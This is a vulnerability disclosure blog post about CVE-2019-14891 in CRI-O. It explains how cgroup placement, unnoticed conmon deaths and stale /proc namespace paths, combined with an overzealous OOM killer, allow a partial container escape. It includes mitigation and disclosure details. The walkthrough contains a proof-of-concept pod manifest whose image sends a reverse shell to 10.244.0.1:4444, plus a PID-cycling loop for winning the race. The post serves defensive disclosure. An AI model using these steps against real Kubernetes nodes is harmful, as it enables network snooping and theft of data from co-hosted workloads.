Subscribe to Email Updates

Gather around the fire for a story about the unlikely partnership of bugs that led to a partial container escape. While this is a fairly technical post covering some container and Kubernetes components, we included links throughout if you want to learn about them or need a refresher while reading.  

TL;DR

Three issues in CRI-O (the default Kubernetes’ container engine for Red Hat’s OpenShift and openSUSE’s Kubic), combined with an overzealous out-of-memory (OOM) killer in recent Linux kernels, can enable a partial container escape for hosts running CRI-O and Kubernetes. If the stars align, a contained process/workload (e.g. your nginx container) can snoop on network traffic and connect to arbitrary services (e.g. the kubelet) on the affected node, as well as interact with the node’s shared memory and IPC mechanisms. In older versions of Kubernetes, this meant whole node takeover. In more recent times, exploitation is more deployment-specific. 

As an example, these vulnerabilities could be exploited to dump all HTTP traffic destined for containers on a node — probably relevant if you use SSL termination early on in your stack — as any customer or corporate data flowing through the compromised node would be fair game to an attacker. This could mean passwords, personally identifiable information (PII), or other goodies could be viewed by an attacker at their leisure.

There’s no need to panic, though. It’s good to note that there isn’t a generic complete container escape or node takeover path using these bugs (on the setups we’ve looked at, anyway). Furthermore, to trigger these issues requires the ability to create a pod based on a container image you control, which requires additional effort by attackers to obtain. So, it’s more like stars have to be aligned between galaxies. There are a number of GitHub issues related to these bugs, but nothing tying all of the elements at play together. After spending some time on the issue we finally reproduced it, and are pleased to share the results with you today!

CVE-2019-14891 has been assigned for one of the issues we identified. Resolution of this issue greatly reduces the likelihood of this scenario manifesting. We’d like to give a big thanks to the CRI-O and Red Hat security teams for their great response and mitigation of these issues!

Is there a patch?

Yes, as of CRI-O version 1.16.1! However, it’s pretty easy to mitigate the issue provided you are running CRI-O v1.15 or greater. Simply add (or change) the following directive in your /etc/crio/crio.conf file:

conmon_cgroup: system.slice

The above is the default setting for conmon_cgroup as of 1.16.1. Read below to find out why putting conmon in a non-pod cgroup is a good idea!

So.. What’s a CRI-O?

CRI-O is a lightweight container engine, like Docker, but one that is built specifically for use with Kubernetes. In fact, it was started as a Kubernetes incubator project. It uses the Kubernetes CRI (Container Runtime Interface) for container management.

CRI-O is the default container engine for Kubic (openSUSe’s Kubernetes distribution) and OpenShift — so while it still has minority market share, it is rapidly gaining popularity.

Pods

We’re not going to explain Kubernetes and Pods here in any real depth. This is a great resource for getting up to speed with that. We’ll grossly simplify things here:

  • A pod is a collection of containers that share some resources
  • A pod will always have at least two containers in it when deployed:
    • An infrastructure container, which will typically run the pause process which just waits for a workload container to finish
    • A workload container (e.g. nginx, clamav, etc) that actually does the work
  • Each pod member will have its own container monitor (conmon in CRI-O the universe, docker-containerd-shim in Docker-land)
  • These containers are created using whatever container runtime is configured. The vast majority of the time, this is runc.

The above stuff will become more relevant soon when we start talking about the different issues in CRI-O. Which is now!

Issue #1: All Process Eggs in One CGroup Basket

The first issue relates to how CRI-O assigns cgroups to processes. One goal of CRI-O is to account for all of the memory usage of each individual pod. To do so, all of the processes related to a given pod are placed in the same memory cgroup. 

An aside: Memory cgroups and the Out-Of-Memory (OOM) killer

What is a memory cgroup? A core component of resource management on Linux — and especially in containers — is the use of control groups (cgroups) to account for and limit resources such as CPU and memory for a process or group of processes. Memory cgroups allow for finer-grained control over how much memory an application can use.

The OOM killer is a kernel helper for dealing with memory-hungry processes. When a system is experiencing very heavy memory usage, the kernel goes around and slays whatever is using the most memory — in the hopes of keeping the system doing whatever it’s meant to be doing. Sounds helpful! The OOM killer uses SIGKILL to get rid of the process (and reclaim memory) as soon as possible.

To be more helpful, the kernel’s OOM killer got a makeover in 4.19+ kernels, gaining cgroup awareness. Now, instead of just killing the single process that is using the most memory on the whole system (I’m looking at you, Chrome), it will monitor cgroups.  For example, if you created a pod (which also creates a cgroup) for your huge Java application and assigned it 256MB of memory, 256MB is all that Java could ever use, even if you have a terabyte of RAM on the host. All processes in that pod’s cgroup are subject to that memory restriction, so if there was another container in that pod (for example, a caching service), it would have to share that same 256MB. If that pod uses its full allotted 256MB, the OOM killer would kill the biggest memory hog in the pod — and not the biggest memory user of the whole system.. 

But the killer can be a bit excitable at times. If two processes in the same memory cgroup trigger the OOM killer at the same time (e.g. by trying to make an allocation on different CPU cores), the OOM killer becomes a literal OOM serial killer — issuing two OOM kills in sequence. This behavior seems to be limited to 4.19 through 5.2.x kernels. Note that if a process is killed with great prejudice (SIGKILL), no signal handlers run. That is, there is no graceful termination or shutdown of the process. The process is just shot in broad daylight. More on this in a moment — but for now, back to CRI-O.

In the interest of keeping track of exactly how much memory a container requires to run, CRI-O lumps the workload process (below, our test program called repro) and the “infrastructure container” process (the pause process — more on this under issue #2) — along with their associated conmon monitor processes — into the same cgroup. You can see the cgroup members in this OOM killer snippet below:

Nov 20 00:56:34 ubu-disco kernel: [  136.324486] Tasks state (memory values in pages):
Nov 20 00:56:34 ubu-disco kernel: [  136.324486] [  pid  ]   uid  tgid total_vm      rss pgtables_bytes swapents oom_score_adj name
Nov 20 00:56:34 ubu-disco kernel: [  136.324576] [   3825]     0  3825    19521      471    57344        0          -999 conmon
Nov 20 00:56:34 ubu-disco kernel: [  136.324577] [   3849]     0  3849      255        1    28672        0          -998 pause
Nov 20 00:56:34 ubu-disco kernel: [  136.324589] [   4254]     0  4254    19521      442    53248        0          -999 conmon
Nov 20 00:56:34 ubu-disco kernel: [  136.324591] [   4304]     0  4304    66664     3632    90112        0           996 repro
Nov 20 00:56:34 ubu-disco kernel: [  136.324595] oom-kill:constraint=CONSTRAINT_MEMCG,nodemask=(null),cpuset=/,mems_allowed=0,oom_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podf8e932ad_5487_4514_a5be_b75ad1b7a6ce.slice,task_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podf8e932ad_5487_4514_a5be_b75ad1b7a6ce.slice/crio-ee55f03bd921c55955d8995a0adbb9f19352603a637ea27f6ca8397b715435eb.scope,task=repro,pid=4304,uid=0
Nov 20 00:56:34 ubu-disco kernel: [  136.324600] Memory cgroup out of memory: Kill process 4304 (repro) score 1657 or sacrifice child
Nov 20 00:56:34 ubu-disco kernel: [  136.324627] Killed process 4304 (repro) total-vm:266656kB, anon-rss:14504kB, file-rss:24kB, shmem-rss:0kB
Nov 20 00:56:34 ubu-disco kernel: [  136.328368] oom_reaper: reaped process 4304 (repro), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB

CRI-O gets +1 for visibility into resource usage, but -9001 for stability — because sometimes, if the OOM killer becomes an OOM serial killer and triggers multiple times, it can kill a container monitor (conmon) process as well as workload and pause processes. This typically manifests as follows:

  1. The workload process (repro, above) allocates a bunch of memory, triggering the OOM killer. 
  2. Very shortly afterwards, and before the OOM killer does its job, one of the conmon processes in the cgroup tries to make an allocation. As the cgroup is already out of memory thanks to the repro process, this triggers the OOM killer again.
  3. OOM killer #1 fires, and kills the workload process for using too much memory. Makes sense. In this case, it tried to allocate 256MB of memory when the cgroup only gave it 18MB.
  4. OOM killer #2 fires, but the offender (the repro process) is already dead. So it kills something else instead. Quite often, it kills the conmon process of the pause (infrastructure) container — which we’ll cover in the next section.

Having conmon in the same cgroup as the containerized processes exposes the underlying container management systems to being killed. CVE-2019-14891 was issued for this problem we identified, which was resolved by putting conmon in a different cgroup to its pods by default.

Issue #2: If a Process Dies in a Forest, and No One is Around..

Our second issue in this chain of unfortunate events relates to how CRI-O doesn’t get notified if a conmon process is killed. No action is taken by CRI-O because CRI-O thinks the conmon process is still alive and well. Unfortunately, it isn’t. While not necessarily a vulnerability, the decentralized container management approach does play its part in this chain of bugs. This is part of a design decision by the CRI-O team: containers should not be tied to daemon, and we as users should be able to restart the cri-o daemon without needing to tear down and rebuild all the containers. 

The conmon container monitor process is important because it, well, monitors a container. If conmon is gone-mon, there is no way for conmon to communicate to the container engine (CRI-O) about the health of whatever it was monitoring. If a conmon process is killed, then whatever process was being managed by that conmon process is re-parented to init or PID 1. If a pause process’ conmon process is killed, then that pause process ends up being reparented to init and it just kind of floats there (more on why that’s bad below). CRI-O still thinks the pod is fully intact. 

Let’s pause for a bit

It’s probably worth taking a second to talk about the pause process and why it’s important. No super-gory details, but enough for some context.

When Kubernetes spins up a pod, it first creates an infrastructure container / pause process. You can actually kind of think of the pod as being the pause process: it holds the namespaces for the pod, and is the parent of the containers that live inside it. And if the infrastructure container (pause process) dies, all of the workload containers in the pod are culled, too.

After the pause process is started, a specification for the containers in that pod is created. The specification includes references for where containers in that podshould get their namespaces from. Whenever a workload process is created (e.g. the nginx container or whatever you were expecting to run), runc will apply the namespaces stored in this specification to the new process using the setns() system call. This ensures that if your nginx process dies, its replacement will be in the same namespaces as its predecessor. By default, a pod will have its own network, IPC, and UTS namespaces. 

Now, let’s return to why the pause process floating in init limbo presents such an issue.

Issue #3: Grief Is A Process

The final part of the puzzle is how CRI-O manages namespaces for pods, which are stored in the form of proc paths for the pause process (e.g. /proc/$PAUSEPID/ns/ipc). As noted in the previous section, these paths are used as the target of setns() calls for all containers created in that pod.

If the pause process goes away — say, due to being killed by that same overzealous OOM serial killer in the kernel — CRI-O never learns that the pause process is gone. This is important, because the next time CRI-O tries to create the workload container, it’s going to tell runc to copy all of the namespaces over from those /proc/$PAUSEPID/ns/x paths. But, runc fails to start the container, as the PID in the namespace path no longer exists due to the pause process’ untimely murder:

Nov 20 01:35:48 ubu-disco crio[871]: time="2019-11-20 01:35:48.213858401Z" level=error msg="Container creation error: container_linux.go:338: creating new parent process caused \"container_linux.go:1897: running lstat on namespace path \\\"/proc/18235/ns/ipc\\\" caused \\\"lstat /proc/18235/ns/ipc: no such file or directory\\\"\"\n"

Ultimately, PIDs gets recycled, and $PAUSEPID will be assigned to some other new process. Assuming the new owner of $PAUSEPID is still alive when Kubernetes next tries to schedule that pod, runc will dutifully copy over whatever namespaces the new, shiny $PAUSEPID has. If $PAUSEPID belongs to a node process (instead of a pod process), then the new container gets host IPC, NET, and UTS namespaces, which looks something like this:

Nov 20 01:37:04 ubu-disco systemd[1]: Started crio-conmon-d7633a9ceb7ead21e04422ce1779d2bad122907d15fd1122f0a1c4143d42830b.scope.
Nov 20 01:37:04 ubu-disco systemd[1]: Created slice libcontainer_18509_systemd_test_default.slice.
Nov 20 01:37:04 ubu-disco systemd[1]: Removed slice libcontainer_18509_systemd_test_default.slice.
Nov 20 01:37:04 ubu-disco systemd[1]: Started libcontainer container d7633a9ceb7ead21e04422ce1779d2bad122907d15fd1122f0a1c4143d42830b.
Nov 20 01:37:04 repro-pod10-6c8bdc448f-47mhk systemd-resolved[687]: System hostname changed to 'repro-pod10-6c8bdc448f-47mhk'.

Aside from giving the attacker the ability to change the hostname, this also lets the attacker interact with the underlying node’s network interfaces and traffic, as well as its IPC/shared memory instances. Simply put, the attacker can discover any sensitive data flowing through the node (i.e. any pods running on it). Our PoC video demonstrates us using tcpdump to show network traffic on all of the node’s interfaces.

This issue is in the process of being resolved by the CRI-O team, by creating namespace file descriptors and bind-mounting them into pods instead of hard-coding a path to a transient process in /proc. This means that when runc creates the workload container again, it won’t be relying on a path that could have information belonging to an out-of-pod process. This should land in the next couple of weeks, but really, the patch for issue #1 will largely mitigate this issue if you run CRI-O.

All Together Now

The steps we describe below outline how the above issues could be grouped together to achieve a partial container escape – where we get some host namespaces (ipc, net and uts), but not all of them. The process names and PIDs referenced below line up with those in the video, if you want to play along.

1 – A new pod is created with a memory limit, resulting in four processes and two containers:

  • pause (the infrastructure container / pod process) and its associated conmon. The PID of the pause process (18235) is used to construct namespace paths (e.g. /proc/18235/ns/ipc) that are assigned to the sandbox container specification which is used when creating new containers in the pod.
  • repro (the workload container / process) and its associated conmon. It gets its namespaces assigned from the pause process (PID 18235). The repro process first checks to see if it’s in the node’s UTS namespace. If it is, it sends a reverse shell to the attacker. If it isn’t, it tries to allocate 256MB of memory. Here’s the pod configuration we used:
apiVersion: apps/v1
kind: Deployment
metadata:
  name: repro-pod2
spec:
  selector:
    matchLabels:
      name: repro-pod2
  template:
    metadata:
      labels:
        name: repro-pod2
    spec:
      containers:
        - name: repro-pod2
          image: docker.io/c8vt/repro-killer:latest
          resources:
            limits:
              memory: 21Mi
          command: ["/repro"]
          args: ["10.244.0.1", "4444"]
      imagePullSecrets:
      - name: regcred

2 – The workload process (repro) allocates too much memory, invoking the kernel’s OOM killer.

3 – While this is taking place, the conmon process that manages the workload process also tries to allocate something, but as its memory cgroup is still in an OOM state, this fails too and invokes the kernel’s OOM killer. The OOM killer’s actions are serialized, so this takes place after the OOM killer round initiated from step #2.

  • Sometimes, a third allocation occurs at the same time. When this happens, we might skip steps #7-10, as the OOM killer kills the pause process at the same time.

4 – The OOM killer from step #2 kills the misbehaving workload process (repro) successfully.

Nov 20 01:35:43 ubu-disco kernel: Tasks state (memory values in pages):
Nov 20 01:35:43 ubu-disco kernel: [  pid  ]   uid  tgid total_vm      rss pgtables_bytes swapents oom_score_adj name
Nov 20 01:35:43 ubu-disco kernel: [  18197]     0 18197    19521      476    57344        0          -999 conmon
Nov 20 01:35:43 ubu-disco kernel: [  18235]     0 18235      255        1    32768        0          -998 pause
Nov 20 01:35:43 ubu-disco kernel: [  18653]     0 18653    19521      460    53248        0          -999 conmon
Nov 20 01:35:43 ubu-disco kernel: [  18724]     0 18724    66664     3629    90112        0           996 repro
Nov 20 01:35:43 ubu-disco kernel: oom-kill:constraint=CONSTRAINT_MEMCG,nodemask=(null),cpuset=crio-2636c2063b8682d6d5c6a81d74d5eddd14dd676445990f1b19e92919d6568acb.scope,mems_allowed=0,oom_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podfc0c0365_8e33_4543_a78c_a8958532a596.slice,task_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podfc0c0365_8e33_4543_a78c_a8958532a596.slice/crio-2636c2063b8682d6d5c6a81d74d5eddd14dd676445990f1b19e92919d6568acb.scope,task=repro,pid=18724,uid=0
Nov 20 01:35:43 ubu-disco kernel: Memory cgroup out of memory: Kill process 18724 (repro) score 1656 or sacrifice child
Nov 20 01:35:43 ubu-disco kernel: Killed process 18724 (repro) total-vm:266656kB, anon-rss:14504kB, file-rss:12kB, shmem-rss:0kB
Nov 20 01:35:43 ubu-disco kernel: conmon invoked oom-killer: gfp_mask=0x6040c0(GFP_KERNEL|__GFP_COMP), order=0, oom_score_adj=-999

5 – The OOM killer from step #3 starts (you can actually see it in the last line of the output above), and decides someone else needs to die. Sometimes this is the other conmon process — the one watching over the pause / infrastructure process. CRI-O is not informed of this death, and thinks that everything is still fine (aside from the workload process being killed, which triggers the usual Kubernetes backoff process). 

  • In the case below, the pause process was actually killed first.
Nov 20 01:35:43 ubu-disco kernel: Tasks state (memory values in pages):
Nov 20 01:35:43 ubu-disco kernel: [  pid  ]   uid  tgid total_vm      rss pgtables_bytes swapents oom_score_adj name
Nov 20 01:35:43 ubu-disco kernel: [  18197]     0 18197    19521      476    57344        0          -999 conmon
Nov 20 01:35:43 ubu-disco kernel: [  18235]     0 18235      255        1    32768        0          -998 pause
Nov 20 01:35:43 ubu-disco kernel: [  18653]     0 18653    19521      460    53248        0          -999 conmon
Nov 20 01:35:43 ubu-disco kernel: oom-kill:constraint=CONSTRAINT_MEMCG,nodemask=(null),cpuset=/,mems_allowed=0,oom_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podfc0c0365_8e33_4543_a78c_a8958532a596.slice,task_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podfc0c0365_8e33_4543_a78c_a8958532a596.slice/crio-conmon-d2f0d56a2b6de8b76ecbcde807b5297c416cc909457b75842beb7b661a001f94.scope,task=conmon,pid=18197,uid=0
Nov 20 01:35:43 ubu-disco kernel: Memory cgroup out of memory: Kill process 18197 (conmon) score 0 or sacrifice child
Nov 20 01:35:43 ubu-disco kernel: Killed process 18235 (pause) total-vm:1020kB, anon-rss:4kB, file-rss:0kB, shmem-rss:0kB

6 – With the infrastructure container’s conmon dead, its process (pause) is orphaned and reparented to the node’s init process.

7 – Backoff timeout is reached, and the Kubelet asks CRI-O to make another workload process (repro) for the pod, which it does. As expected, runc is invoked and it copies the namespaces from the pause paths (/proc/18235/ns/[ipc|net|uts])

8 – The new workload process (a new repro) allocates too much memory again, invoking the OOM killer again. (same as step #2)

9 – The workload’s conmon process tries to allocate something while the cgroup is OOMed, also invoking the kernel’s OOM killer (same as step #3)

10 – The OOM killer from step #8 kills the workload process (same as step #4)

11 – The OOM killer from step #9 looks for something to kill, and settles on the pause process (PID 18235). CRI-O is not informed of its death. The sandbox container specification (from step 1.1) is not changed, and still holds a reference to the now-dead pause process’ namespace paths (/proc/18235/ns/[ipc|net|uts]).

Note: At this point, all processes related to the pod are dead. The only remaining references to the sandbox exist in CRI-O.

12 – Step #7 keeps on repeating, but failing, because whenever a new repro / workload process is started, runc tries to copy over its namespaces from the paths in the container spec (those of the dead pause process, 18235). This is where we see that “lstat” error in logs from Issue #3:

Nov 20 01:35:48 ubu-disco crio[871]: time="2019-11-20 01:35:48.213858401Z" level=error msg="Container creation error: container_linux.go:338: creating new parent process caused \"container_linux.go:1897: running lstat on namespace path \\\"/proc/18235/ns/ipc\\\" caused \\\"lstat /proc/18235/ns/ipc: no such file or directory\\\"\"\n"

13 – Eventually, PIDs wrap, and some other process gets PID 18235 (the PID of the old pause process). We can help this along with a loop, which will iterate through all PIDs until it is assigned the desired PID, at which point it sleeps — ensuring that the PID is referenceable by runc when it’s next time to create the repro container:

while :; do sh -c 'if [ $$ -eq 18235 ]; then echo "Sleeping as PID $$"; exec sleep 700; fi'; done

14 – Step #7 repeats again, and the workload process / container is successfully launched,  because runc could copy namespaces from our sleep process. If that new PID is in a different namespace (e.g. the host’s namespace), then the containerized process gets those namespaces. The namespaces copied are net, uts, and ipc.

15 – As the workload is being created, runc runs sethostname() which would normally set the contained process’ hostname to the pod’s name. Due to the container now having the node’s uts namespace, the whole node is assigned the pod’s name.

Nov 20 01:37:04 ubu-disco systemd[1]: Started crio-conmon-d7633a9ceb7ead21e04422ce1779d2bad122907d15fd1122f0a1c4143d42830b.scope.
Nov 20 01:37:04 ubu-disco systemd[1]: Created slice libcontainer_18509_systemd_test_default.slice.
Nov 20 01:37:04 ubu-disco systemd[1]: Removed slice libcontainer_18509_systemd_test_default.slice.
Nov 20 01:37:04 ubu-disco systemd[1]: Started libcontainer container d7633a9ceb7ead21e04422ce1779d2bad122907d15fd1122f0a1c4143d42830b.
Nov 20 01:37:04 repro-pod10-6c8bdc448f-47mhk systemd-resolved[687]: System hostname changed to 'repro-pod10-6c8bdc448f-47mhk'.

Here’s the video of it all in play:

Exploitation scenario

The likelihood of these bugs actually being exploited is pretty minimal. It requires a few stars to be aligned:

  • The target is running CRI-O, which has relatively low adoption
  • The target is running a kernel between v4.19 and 5.2 (inclusive)
  • The attacker can either 1) deploy a pod of their choosing or 2) control an image that they know will be deployed, and know that it will be deployed with a memory limit in place
  • The PID race is won (could take some time)
  • And even then, the impact depends on the deployment and whether there is actually something of value to dump or interact with on the host’s network interfaces.

These things could definitely happen, but that’s a lot of stars.

Conclusion

This is a pretty quirky collection of issues that, when combined, could result in an unprivileged pod getting access to sensitive host resources — such as privileged services running on the loopback interface, shared memory/IPC resources, and the ability to watch any network traffic on the node. Patch and reconfigure CRI-O or upgrade your kernel to the 5.3.x series so you won’t need to thank your lucky stars.

The Capsule8 Labs team conducts offensive and defensive research to understand the threat landscape for modern infrastructure and to continuously improve Capsule8’s attack coverage.

Scroll to Top